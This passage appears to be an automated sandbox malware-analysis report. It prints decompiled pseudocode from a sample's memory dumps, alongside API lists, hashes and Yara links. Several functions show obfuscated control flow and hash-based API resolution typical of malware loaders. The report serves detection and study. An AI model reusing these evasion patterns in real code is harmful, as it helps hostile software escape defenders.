Instruction Fuzzy Hash: DD513BB2600209AFDF11EFA1DC85EEEBB7CFF04354F00802AF915A6191DB35DA958B64

Uniqueness

Uniqueness Score: -1.00%

Function 00422488, Relevance: 10.6, APIs: 7, Instructions: 67
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00422488(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t24;
				void* _t29;
				int _t32;
				struct HWND__* _t36;

				_push(__ecx);
				_t29 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t36 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t36 != 0) {
					_t32 = _a4 << 0x10;
					do {
						_t24 = SendMessageA(_t36, 0x20a, _t32, _a8);
						_t36 = GetParent(_t36);
					} while (_t24 == 0 && _t36 != 0 && _t36 != _v8);
				} else {
					_t24 = SendMessageA( *(_t29 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t24;
			}

0x0042248b
0x00422495
0x0042249e
0x004224a0
0x004224a2
0x004224a2
0x004224ae
0x004224b0
0x004224b2
0x004224b2
0x004224bf
0x004224c9
0x004224cc
0x004224f8
0x004224fa
0x0042250b
0x00422515
0x00422515
0x004224ce
0x004224eb
0x004224eb
0x00422528

APIs

GetKeyState.USER32(00000011), ref: 00422499
GetKeyState.USER32(00000010), ref: 004224A9
GetFocus.USER32(?,?,?,00000098), ref: 004224B9
GetDesktopWindow.USER32 ref: 004224C1
SendMessageA.USER32(?,0000020A,?,?), ref: 004224E5
SendMessageA.USER32(00000000,0000020A,?,?), ref: 00422504
GetParent.USER32(00000000), ref: 0042250D

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageSendState$DesktopFocusParentWindow
String ID:
API String ID: 4150626516-0
Opcode ID: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
Instruction ID: 20f266b1a498cc3956224d16169f9dc1dc704df93882e012ad9005a8c3fefddb
Opcode Fuzzy Hash: b8e35de3de85cc4ca708d73bd46ae120fcf3247ce85a6db4a513c4a3f9181852
Instruction Fuzzy Hash: A4110D32B00334BFEB502BA5AD48EAA7798EB14794F904137FE41D7250DBF49C4256E4

Uniqueness

Uniqueness Score: -1.00%

Function 00422473, Relevance: 7.6, APIs: 5, Instructions: 52
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00422473(void* __eax, void* __ebx, void* __edx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				long _t33;
				void* _t40;
				int _t43;
				struct HWND__* _t47;
				void* _t49;

				 *((intOrPtr*)(_t49 + __eax + 0x6a)) =  *((intOrPtr*)(_t49 + __eax + 0x6a)) + __edx;
				 *((intOrPtr*)(__eax - 0x15)) =  *((intOrPtr*)(__eax - 0x15)) + __ebx;
				_push(_t49);
				_push(0x98);
				_push(__ebx);
				_t40 = 0x98;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t47 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t47 != 0) {
					_t43 = _a4 << 0x10;
					do {
						_t33 = SendMessageA(_t47, 0x20a, _t43, _a8);
						_t47 = GetParent(_t47);
					} while (_t33 == 0 && _t47 != 0 && _t47 != _v8);
				} else {
					_t33 = SendMessageA( *(_t40 + 0x1c), 0x20a, _a4 << 0x10, _a8);
				}
				return _t33;
			}

0x00422478
0x0042247c
0x00422488
0x0042248b
0x0042248c
0x00422495
0x0042249e
0x004224a0
0x004224a2
0x004224a2
0x004224ae
0x004224b0
0x004224b2
0x004224b2
0x004224bf
0x004224c9
0x004224cc
0x004224f8
0x004224fa
0x0042250b
0x00422515
0x00422515
0x004224ce
0x004224eb
0x004224eb
0x00422528

APIs

GetKeyState.USER32(00000011), ref: 00422499
GetKeyState.USER32(00000010), ref: 004224A9
GetFocus.USER32(?,?,?,00000098), ref: 004224B9
GetDesktopWindow.USER32 ref: 004224C1
SendMessageA.USER32(?,0000020A,?,?), ref: 004224E5

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State$DesktopFocusMessageSendWindow
String ID:
API String ID: 2814764316-0
Opcode ID: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
Instruction ID: b57d560b4246ca497f525dd7341a5897b5c585060d52b80c51f82830bbc2b57b
Opcode Fuzzy Hash: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
Instruction Fuzzy Hash: 4C012032B003257FEB102B94ED45FA97798EB147A4F904437FE42D7191EAF8AC4396A4

Uniqueness

Uniqueness Score: -1.00%

Function 02237740, Relevance: 6.5, Strings: 5, Instructions: 224
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E02237740() {
				void* __ebx;
				void* __ebp;
				intOrPtr* _t84;
				signed int _t85;
				signed int _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				void* _t101;
				signed int _t106;
				void* _t117;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr* _t152;
				intOrPtr _t158;
				short* _t160;
				void* _t164;
				void* _t166;
				void* _t172;
				void* _t177;
				void* _t179;

				 *(_t177 + 0x14) = 0xad9f;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x55c37b00;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0xd5c3ff9e;
				 *(_t177 + 0x10) = 0x20cd;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x00419a00;
				 *(_t177 + 4) = 0x7d7a;
				_push(_t117);
				 *(_t177 + 0x14) =  *(_t177 + 4) * 0x25;
				_t172 = 0;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) >> 0xa;
				_t164 = 0x37433c74;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x2c89345e;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0x4d378000;
				 *(_t177 + 0x18) = 0xca95;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) + 0xcbf5;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) | 0x7c83d5b7;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x6758ba30;
				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x1bdb6d8d;
				 *(_t177 + 0x10) = 0xd33c;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
				_t158 =  *((intOrPtr*)(_t177 + 0x2c));
				 *(_t177 + 0x10) = 0x38e38e39 *  *(_t177 + 0x10) >> 0x20 >> 1;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0xe07bc090;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) * 0x69;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 1;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 0xb;
				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x0df2b000;
				 *(_t177 + 0x1c) = 0xac79;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) << 1;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) + 0x2d22;
				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) ^ 0x00018615;
				goto L1;
				do {
					while(1) {
						L1:
						_t179 = _t164 - 0x2d3069ff;
						if(_t179 <= 0) {
							break;
						}
						if(_t164 == 0x342fd613) {
							_t160 =  *0x223e2ec + 0x278;
							while( *_t160 != 0x5c) {
								_t160 = _t160 + 2;
							}
							_t158 = _t160 + 2;
							_t164 = 0x2685696e;
							continue;
						} else {
							if(_t164 != 0x37433c74) {
								goto L9;
							} else {
								_t164 = 0x194519ad;
								continue;
							}
						}
						L32:
					}
					if(_t179 == 0) {
						_t84 =  *0x223e024;
						if(_t84 == 0) {
							_t84 = E02233E80(_t117, E02233F20(0xbb398380), 0x5262aefc, _t172);
							 *0x223e024 = _t84;
						}
						_t85 =  *_t84(_t177 + 0x30);
						_t147 =  *0x223e194;
						 *((intOrPtr*)(_t177 + 0x2c)) = 2 + _t85 * 2;
						if(_t147 == 0) {
							_t147 = E02233E80(_t117, E02233F20(0x667fdee), 0x1595373a, _t172);
							 *0x223e194 = _t147;
						}
						_t89 =  *_t147( *((intOrPtr*)(_t177 + 0x3c)), _t158,  *(_t177 + 0x18),  *((intOrPtr*)(_t177 + 0x20)), _t177 + 0x30,  *((intOrPtr*)(_t177 + 0x2c)));
						_t164 = 0x1ff1a285;
						asm("sbb ebp, ebp");
						_t172 =  ~_t89 + 1;
						goto L1;
					} else {
						if(_t164 == 0x194519ad) {
							_t166 = E022334C0(0x223d8f0);
							_t91 =  *0x223dc60;
							if(_t91 == 0) {
								_t91 = E02233E80(_t117, E02233F20(0xe66945e6), 0xcca28b0d, _t172);
								 *0x223dc60 = _t91;
							}
							_t149 =  *0x223e2ec;
							 *_t91(_t177 + 0x3c, 0x104, _t166, _t149 + 0x5c, _t149 + 0x278);
							_t93 =  *0x223dea8;
							_t177 = _t177 + 0x14;
							if(_t93 == 0) {
								_t93 = E02233E80(_t117, E02233F20(0xbb398380), 0x97f883e, _t172);
								 *0x223dea8 = _t93;
							}
							_t117 =  *_t93();
							_t95 =  *0x223e1a0;
							if(_t95 == 0) {
								_t95 = E02233E80(_t117, E02233F20(0xbb398380), 0x26c3f343, _t172);
								 *0x223e1a0 = _t95;
							}
							 *_t95(_t117, 0, _t166);
							_t164 = 0x342fd613;
							goto L1;
						} else {
							if(_t164 == 0x1ff1a285) {
								_t97 =  *0x223dfc4; // 0x0
								if(_t97 == 0) {
									_t97 = E02233E80(_t117, E02233F20(0x667fdee), 0x217c84a0, _t172);
									 *0x223dfc4 = _t97;
								}
								 *_t97( *((intOrPtr*)(_t177 + 0x28)));
								return _t172;
							} else {
								if(_t164 == 0x2685696e) {
									_t101 = E022334C0(0x223d960);
									_t152 =  *0x223dbec; // 0x0
									_t117 = _t101;
									if(_t152 == 0) {
										_t152 = E02233E80(_t117, E02233F20(0x667fdee), 0x7aac94ee, _t172);
										 *0x223dbec = _t152;
									}
									_t106 =  *_t152( *((intOrPtr*)(_t177 + 0x40)), _t117,  *((intOrPtr*)(_t177 + 0x34)), 0,  *(_t177 + 0x1c),  *(_t177 + 0x18), 0, _t177 + 0x28, 0);
									asm("sbb esi, esi");
									_t164 = ( ~_t106 & 0x09cffb0d) + 0x2d3069ff;
									E02233460(_t117);
								}
								goto L9;
							}
						}
					}
					goto L32;
					L9:
				} while (_t164 != 0x3700650c);
				return _t172;
				goto L32;
			}

0x02237746
0x0223774e
0x02237756
0x0223775e
0x02237766
0x0223776b
0x02237773
0x02237780
0x02237784
0x02237788
0x0223778a
0x0223778f
0x02237794
0x0223779c
0x022377a8
0x022377b1
0x022377b9
0x022377c1
0x022377c9
0x022377d1
0x022377d9
0x022377e1
0x022377e9
0x022377f4
0x022377fa
0x022377fe
0x0223780b
0x0223780f
0x02237813
0x02237818
0x02237820
0x02237828
0x0223782c
0x02237834
0x02237834
0x02237840
0x02237840
0x02237840
0x02237840
0x02237846
0x00000000
0x00000000
0x02237a37
0x02237a55
0x02237a5f
0x02237a61
0x02237a64
0x02237a6a
0x02237a6d
0x00000000
0x02237a39
0x02237a3f
0x00000000
0x02237a45
0x02237a45
0x00000000
0x02237a45
0x02237a3f
0x00000000
0x02237a37
0x0223784c
0x022379a7
0x022379ae
0x022379c1
0x022379c6
0x022379c6
0x022379d0
0x022379d2
0x022379df
0x022379e5
0x022379fd
0x022379ff
0x022379ff
0x02237a1e
0x02237a22
0x02237a29
0x02237a2b
0x00000000
0x02237852
0x02237858
0x02237904
0x02237906
0x0223790d
0x02237920
0x02237925
0x02237925
0x0223792a
0x02237946
0x02237948
0x0223794d
0x02237952
0x02237965
0x0223796a
0x0223796a
0x02237971
0x02237973
0x0223797a
0x0223798d
0x02237992
0x02237992
0x0223799b
0x0223799d
0x00000000
0x0223785e
0x02237864
0x02237a77
0x02237a7e
0x02237a91
0x02237a96
0x02237a96
0x02237a9f
0x02237aad
0x0223786a
0x02237870
0x02237877
0x0223787c
0x02237882
0x02237886
0x0223789e
0x022378a0
0x022378a0
0x022378c6
0x022378ce
0x022378d6
0x022378dc
0x022378dc
0x00000000
0x02237870
0x02237864
0x02237858
0x00000000
0x022378e1
0x022378e1
0x022378f9
0x00000000

Strings

z}, xrefs: 02237773
t<C7, xrefs: 02237A39
"-, xrefs: 0223782C
Ei, xrefs: 0223790F
t<C7, xrefs: 0223778F

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: "-$t<C7$t<C7$z}$Ei
API String ID: 0-1832362217
Opcode ID: e4adcce6c35a1f889401b5948a6bf664202137480bc17e0be31b9365fbb61e49
Instruction ID: ffdbdb14ab31fa6b2e8b7a2e8d621c55d7d2d710b0a3df79f717aa686a4ac370
Opcode Fuzzy Hash: e4adcce6c35a1f889401b5948a6bf664202137480bc17e0be31b9365fbb61e49
Instruction Fuzzy Hash: D581E0B1A143029FC715EFA4E848A2BB7E6ABC4704F40491CF496C7258EB74DE08CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0041580E, Relevance: 6.0, APIs: 4, Instructions: 38
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041580E(void* __ecx) {
				void* _t11;
				void* _t12;
				void* _t16;

				_t12 = __ecx;
				if((E00416528(__ecx) & 0x40000000) != 0) {
					L6:
					return E004136A7(_t12);
				}
				_t16 = E00404DAE();
				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
					_t11 = 1;
					return _t11;
				}
			}

0x00415811
0x0041581d
0x00415865
0x00000000
0x00415867
0x00415824
0x00415828
0x00000000
0x0041584b
0x0041585a
0x00415862
0x00000000
0x00415862

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetKeyState.USER32(00000010), ref: 00415832
GetKeyState.USER32(00000011), ref: 0041583B
GetKeyState.USER32(00000012), ref: 00415844
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0041585A

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
Instruction ID: 667728aae4084d5946ddf495d1d29dbc27f199ee829e175ed2889692379dfdac
Opcode Fuzzy Hash: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
Instruction Fuzzy Hash: 47F0E232740746E5E63036931C42FD913144FC0BD4F45083AB701AE1D18A9988E30278

Uniqueness

Uniqueness Score: -1.00%

Function 02236530, Relevance: 5.6, Strings: 4, Instructions: 596
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E02236530(void* __edx) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v48;
				char _v76;
				signed int _v80;
				char _v88;
				char _v96;
				char _v100;
				char _v104;
				char _v112;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* __ebx;
				void* __ebp;
				void* _t198;
				void* _t200;
				signed int _t207;
				signed int _t209;
				signed int _t214;
				signed int _t220;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				intOrPtr* _t227;
				signed int _t228;
				void* _t229;
				void* _t230;
				signed int _t234;
				signed int _t236;
				void* _t237;
				signed int _t240;
				intOrPtr* _t241;
				signed int _t242;
				void* _t243;
				void* _t244;
				signed int _t249;
				void* _t254;
				signed int _t255;
				intOrPtr* _t256;
				void* _t257;
				intOrPtr* _t258;
				signed int _t259;
				void* _t260;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t280;
				signed int _t285;
				intOrPtr* _t287;
				signed int _t293;
				signed int _t300;
				signed int _t304;
				intOrPtr _t308;
				signed int _t318;
				signed int _t347;
				signed int _t348;
				signed int _t369;
				signed int _t371;
				void* _t375;
				signed int _t385;
				signed int _t391;
				signed int _t396;
				void* _t398;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;

				_t398 = (_t396 & 0xfffffff8) - 0x80;
				_t300 = _v120;
				_t191 = 0x12823d32;
				_t391 = _v124;
				while(1) {
					L1:
					_t375 = 0x2564be4f;
					do {
						while(1) {
							L2:
							_t400 = _t191 - 0x1ff46034;
							if(_t400 > 0) {
								goto L60;
							}
							L3:
							if(_t400 == 0) {
								return E0223B160();
							} else {
								_t401 = _t191 - 0xfd5a1ac;
								if(_t401 > 0) {
									__eflags = _t191 - 0x16bf64f2;
									if(__eflags > 0) {
										__eflags = _t191 - 0x1ea773fc;
										if(__eflags > 0) {
											__eflags = _t191 - 0x1fdef138;
											if(_t191 != 0x1fdef138) {
												break;
											} else {
												_v8 =  *((intOrPtr*)( *0x223e2ec + 0x48));
												_t191 = 0x1ea773fc;
												continue;
											}
										} else {
											if(__eflags == 0) {
												_v40 = E02235360(_t300, _t391);
												_t191 = 0x216a974b;
												continue;
											} else {
												__eflags = _t191 - 0x1c32e2d2;
												if(_t191 == 0x1c32e2d2) {
													E02234250(_t300, _v112);
													_t191 = 0x39deb3f9;
													continue;
												} else {
													__eflags = _t191 - 0x1c5e7f9f;
													if(_t191 != 0x1c5e7f9f) {
														break;
													} else {
														_t191 = 0x30d1bd42;
														continue;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t272 = E02235F60( &_v76, _t347, _t391);
											__eflags = _t272;
											if(_t272 == 0) {
												L77:
												_t191 = 0x1ff46034;
											} else {
												_v48 =  &_v76;
												_t274 =  *0x223e144;
												__eflags = _t274;
												if(_t274 == 0) {
													_t276 = E02233F20(0xbb398380);
													_t347 = 0x5262aeca;
													_t274 = E02233E80(_t300, _t276, 0x5262aeca, _t391);
													 *0x223e144 = _t274;
												}
												_t327 =  &_v76;
												_v48 =  *_t274( &_v76);
												_t191 = 0x1fdef138;
											}
											continue;
										} else {
											__eflags = _t191 - 0x14860a92;
											if(__eflags > 0) {
												__eflags = _t191 - 0x166b1152;
												if(_t191 != 0x166b1152) {
													break;
												} else {
													E02238EA0();
													_t191 = 0x1381dc55;
													continue;
												}
											} else {
												if(__eflags == 0) {
													E02238550(_t300);
													_t191 = 0x2aa5d516;
													continue;
												} else {
													__eflags = _t191 - 0x12823d32;
													if(_t191 == 0x12823d32) {
														_t191 = 0x27047861;
														continue;
													} else {
														__eflags = _t191 - 0x1381dc55;
														if(_t191 != 0x1381dc55) {
															break;
														} else {
															E02239470(_t391);
															_t191 = 0x315a7589;
															continue;
														}
													}
												}
											}
										}
									}
								} else {
									if(_t401 == 0) {
										_t280 = E022390C0();
										asm("sbb eax, eax");
										_t191 = ( ~_t280 & 0x0810ea45) + 0xb70f210;
										continue;
									} else {
										_t402 = _t191 - 0xd28318f;
										if(_t402 > 0) {
											__eflags = _t191 - 0xe9d6a0f;
											if(__eflags > 0) {
												__eflags = _t191 - 0xf0c159c;
												if(_t191 != 0xf0c159c) {
													break;
												} else {
													_t209 = E022396B0();
													__eflags = _t209;
													if(_t209 == 0) {
														L142:
														return _t209;
													} else {
														_t191 = 0xfd5a1ac;
														continue;
													}
												}
											} else {
												if(__eflags == 0) {
													E02237EC0();
													__eflags =  *( *0x223e2ec + 0x268);
													_t191 =  !=  ? 0x21c0adc4 : 0x14860a92;
													continue;
												} else {
													__eflags = _t191 - 0xddcb99d;
													if(_t191 == 0xddcb99d) {
														_t285 = E0223B2B0( &_v88, _t391);
														__eflags = _t285;
														if(_t285 != 0) {
															asm("xorps xmm0, xmm0");
															_t391 = 0x8e1a01c;
															asm("movlpd [esp+0x18], xmm0");
															_t300 = _v120;
														}
														L30:
														_t191 = 0xa28b6e5;
														continue;
													} else {
														__eflags = _t191 - 0xe0d6cd8;
														if(_t191 != 0xe0d6cd8) {
															break;
														} else {
															E02239D70(_t300);
															_t347 = 0xcfd93ac1;
															_t391 = 0x1c5e7f9f;
															_t287 = E02234190(_t300, 0xbb398380, 0xcfd93ac1, 0x1c5e7f9f, 0xcf);
															_t398 = _t398 + 4;
															 *_t287();
															_t300 = 0xcfd93ac1;
															L27:
															_t191 = 0x2537e9de;
															continue;
														}
													}
												}
											}
										} else {
											if(_t402 == 0) {
												_v124 = 0x669c;
												_t347 = 0xcccccccd * _v124 >> 0x20 >> 5;
												_v124 = _t347;
												_v124 = _v124 ^ 0x00000178;
												_v28 = _v124;
												_t191 = 0x8e1a01c;
												continue;
											} else {
												_t403 = _t191 - 0x8e1a01c;
												if(_t403 > 0) {
													__eflags = _t191 - 0xa28b6e5;
													if(_t191 == 0xa28b6e5) {
														E02234250(_t300, _v96);
														_t191 = 0x1c32e2d2;
														continue;
													} else {
														__eflags = _t191 - 0xb70f210;
														if(_t191 != 0xb70f210) {
															break;
														} else {
															_t293 = E02238240(_t300, _t391);
															_t308 =  *0x223e2ec;
															__eflags = _t293;
															if(_t293 == 0) {
																__eflags =  *(_t308 + 0x268);
																_t191 =  !=  ? 0x3278b521 : 0x166b1152;
															} else {
																__eflags =  *(_t308 + 0x268);
																_t191 =  !=  ? _t375 : 0xe0d6cd8;
															}
															continue;
														}
													}
												} else {
													if(_t403 == 0) {
														E022360E0( &_v24);
														_t191 = 0x4326e25;
														while(1) {
															L2:
															_t400 = _t191 - 0x1ff46034;
															if(_t400 > 0) {
																goto L60;
															}
															goto L3;
														}
														goto L60;
													} else {
														if(_t191 == 0x2c8787f) {
															E02238530();
															_t191 = 0xddcb99d;
															while(1) {
																L2:
																_t400 = _t191 - 0x1ff46034;
																if(_t400 > 0) {
																	goto L60;
																}
																goto L3;
															}
														} else {
															if(_t191 != 0x4326e25) {
																break;
															} else {
																E0223B050( &_v16);
																_t191 = 0x2b42ebb2;
																while(1) {
																	L2:
																	_t400 = _t191 - 0x1ff46034;
																	if(_t400 > 0) {
																		goto L60;
																	}
																	goto L3;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
							L143:
							L60:
							__eflags = _t191 - 0x2b42ebb2;
							if(__eflags > 0) {
								__eflags = _t191 - 0x3299e430;
								if(__eflags > 0) {
									__eflags = _t191 - 0x39deb3f9;
									if(__eflags > 0) {
										__eflags = _t191 - 0x39f8f5db;
										if(_t191 != 0x39f8f5db) {
											break;
										} else {
											_v124 = 0xaaf5;
											_t391 = 0x16bf64f2;
											_v124 = _v124 >> 3;
											_v124 = _v124 + 0xffff9253;
											_v124 = _v124 ^ 0xffff9931;
											_v128 = 0xf5b3;
											_v128 = _v128 + 0xb403;
											_v128 = _v128 + 0xffff5bc8;
											_v128 = _v128 + 0x6fbb;
											_v128 = _v128 + 0xe315;
											_v128 = _v128 | 0x5d55179d;
											_v128 = _v128 + 0xafac;
											_v128 = _v128 << 2;
											_v128 = _v128 ^ 0x7560216c;
											_t157 =  &_v128; // 0x7560216c
											__eflags = _v124 -  *_t157;
											if(_v124 <=  *_t157) {
												__eflags = 0;
											} else {
												_t348 =  *0x223dd4c;
												__eflags = _t348;
												if(_t348 == 0) {
													_t348 = E02233E80(_t300, E02233F20(0xbb398380), 0xae3c1a47, 0x16bf64f2);
													 *0x223dd4c = _t348;
												}
												_v124 = 0xaaf5;
												_v124 = _v124 >> 3;
												_v124 = _v124 + 0xffff9253;
												_v124 = _v124 ^ 0xffff9931;
												_t200 = E02235E10();
												_t347 =  *_t348() % (_v124 - _t200);
											}
											_t318 =  *0x223ddbc; // 0x0
											__eflags = _t318;
											if(_t318 == 0) {
												_t198 = E02233F20(0xbb398380);
												_t347 = 0xcfd93ac1;
												_t318 = E02233E80(_t300, _t198, 0xcfd93ac1, _t391);
												 *0x223ddbc = _t318;
											}
											_v128 = 0xf5b3;
											_v128 = _v128 + 0xb403;
											_v128 = _v128 + 0xffff5bc8;
											_v128 = _v128 + 0x6fbb;
											_v128 = _v128 + 0xe315;
											_v128 = _v128 | 0x5d55179d;
											_v128 = _v128 + 0xafac;
											_v128 = _v128 << 2;
											_v128 = _v128 ^ 0x7560216c;
											 *_t318();
											_t300 = _t347;
											_t191 = 0x2537e9de;
											asm("adc ebx, 0x0");
											goto L1;
										}
									} else {
										if(__eflags == 0) {
											E02234250(_t300, _v16);
											_t191 = 0x3540656b;
											continue;
										} else {
											__eflags = _t191 - 0x3540656b;
											if(_t191 == 0x3540656b) {
												E02234250(_t300, _v24);
												_t191 = 0x2537e9de;
												continue;
											} else {
												__eflags = _t191 - 0x380a1784;
												if(_t191 != 0x380a1784) {
													break;
												} else {
													_t347 =  &_v88;
													_t207 = E022374E0( &_v96, _t347);
													__eflags = _t207;
													if(_t207 == 0) {
														goto L30;
													} else {
														E0223AE60(0);
														_t327 = _v80;
														_t191 = 0x2c8787f;
														__eflags = _t327;
														if(_t327 != 0) {
															__eflags = _t327 - 7;
															_t327 = 0x3299e430;
															_t191 =  ==  ? 0x3299e430 : 0x2c8787f;
														}
													}
													continue;
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										_t209 = E02238590(_t391);
										goto L142;
									} else {
										__eflags = _t191 - 0x315a7589;
										if(__eflags > 0) {
											__eflags = _t191 - 0x3278b521;
											if(_t191 != 0x3278b521) {
												break;
											} else {
												E02238CD0();
												_t191 = 0x166b1152;
												continue;
											}
										} else {
											if(__eflags == 0) {
												_t209 = E02238A10();
												__eflags = _t209;
												if(_t209 == 0) {
													goto L142;
												} else {
													_t191 = 0xe9d6a0f;
													continue;
												}
											} else {
												__eflags = _t191 - 0x30d1bd42;
												if(_t191 == 0x30d1bd42) {
													_t347 =  &_v100;
													_v104 = E02233310(0x223d2e0, _t347);
													E02231890( &_v104);
													E02233460(_t211);
													_t191 = 0x314203dc;
													while(1) {
														L1:
														_t375 = 0x2564be4f;
														goto L2;
													}
												} else {
													__eflags = _t191 - 0x314203dc;
													if(_t191 != 0x314203dc) {
														break;
													} else {
														_t191 = 0x39f8f5db;
														continue;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									_t347 =  &_v112;
									_t327 =  &_v48;
									_t214 = E022372A0( &_v48, _t347);
									asm("sbb eax, eax");
									_t191 = ( ~_t214 & 0xf0f0f5bd) + 0x39deb3f9;
									continue;
								} else {
									__eflags = _t191 - 0x2564be4f;
									if(__eflags > 0) {
										__eflags = _t191 - 0x2aa5d516;
										if(__eflags > 0) {
											__eflags = _t191 - 0x2acfa9b6;
											if(_t191 != 0x2acfa9b6) {
												break;
											} else {
												_v128 = 0xe36c;
												_t347 =  &_v112;
												_v128 = _v128 * 0x71;
												_v128 = _v128 + 0xffff86a2;
												_v128 = _v128 * 0x7b;
												_v128 = _v128 >> 6;
												_v128 = _v128 | 0x57610b65;
												_v128 = _v128 ^ 0x57e10f64;
												_t220 = E022312B0(_v128, _t347,  &_v96);
												_t398 = _t398 + 4;
												__eflags = _t220;
												if(_t220 == 0) {
													_t327 =  *0x223e2e0;
													 *(_t327 + 0xc) =  &(( *(_t327 + 0xc))[2]);
													__eflags =  *( *(_t327 + 0xc));
													if( *( *(_t327 + 0xc)) == 0) {
														 *(_t327 + 0xc) =  *(_t327 + 8);
													}
													_v128 = 0xc5a1;
													_t391 = 0x8e1a01c;
